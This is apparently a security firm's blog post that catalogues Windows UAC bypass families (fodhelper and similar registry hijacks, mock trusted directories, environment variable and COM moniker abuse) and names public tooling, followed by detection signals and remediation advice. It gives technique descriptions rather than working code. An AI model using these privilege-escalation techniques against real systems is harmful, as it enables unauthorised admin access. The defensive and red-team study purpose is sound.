BIPI
BIPI

UAC Bypass Techniques in 2024: Auto-Elevation and Trusted Directories

Cybersecurity

UAC is a speedbump, not a security boundary. A working catalogue of auto-elevation, mock trusted directories, environment variable hijacks, and COM elevation bypasses for medium-to-high integrity jumps.

By Arjun Raghavan, Security & Systems Lead, BIPI · April 11, 2025 · 10 min read

#windows#uac#bypass#red-team#fodhelper

UAC is not a boundary

Microsoft has said this repeatedly: UAC is a convenience feature. On default settings it auto-elevates signed Microsoft binaries that have autoElevate=true in their manifest. Every UAC bypass abuses one of those binaries.

Family 1: auto-elevated binary hijacks

  • fodhelper.exe reads HKCU\Software\Classes\ms-settings\Shell\Open\command
  • computerdefaults.exe similar registry hijack path
  • eventvwr.exe historical mscfile hijack, patched but variants still ship
  • sdclt.exe and slui.exe with App Paths and shell open hijacks

Family 2: mock trusted directories

Windows trusts C:\Windows\System32 implicitly. By creating C:\Windows \System32\ (note the space after Windows), an unsigned binary can pass IsDirectoryTrusted checks. Used in older bypasses and still works on unpatched 21H2 builds.

Family 3: environment variable hijacks

  • %SystemRoot% and %windir% expansion in auto-elevated processes
  • wsreset.exe checks SystemRoot before launching child binaries
  • Set HKCU env vars, trigger auto-elevated binary, hijack child path

Family 4: COM elevation moniker abuse

The Elevation:Administrator COM moniker lets specific CLSIDs run elevated without a prompt. ICMLuaUtil and CMSTPLUA are the classic CLSIDs used by UACME methods 41 and 23. Sharp-SUACME automates the implementation.

Tooling

  • UACME by hfiref0x: 70+ documented methods with source
  • Sharp-SUACME: C# port of the most reliable methods
  • PowerUp Invoke-WScriptUACBypass for legacy lab targets
  • Metasploit bypassuac_fodhelper module for quick PoC

Detection

Sysmon Event 12/13 on HKCU\Software\Classes\ms-settings is a near-zero-FP signal. Process tree where fodhelper.exe or computerdefaults.exe spawns cmd.exe or powershell.exe is canonical. EDRs flag the registry write, not the process launch, so attackers move to fileless variants.

Remediation

  • Set UAC to Always Notify on admin workstations
  • Remove local admin from interactive users via LAPS plus PAM
  • Defender ASR "Block credential stealing" and "Block process from PSExec"
  • Disable secondary logon service where not needed
  • Audit HKCU\Software\Classes for unexpected DelegateExecute keys
70+
UACME methods publicly documented
<5s
Time to medium-to-high integrity via fodhelper
majority
Bypasses defeated by Always Notify
Treat any local admin user as if UAC did not exist, because for an attacker it does not.

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.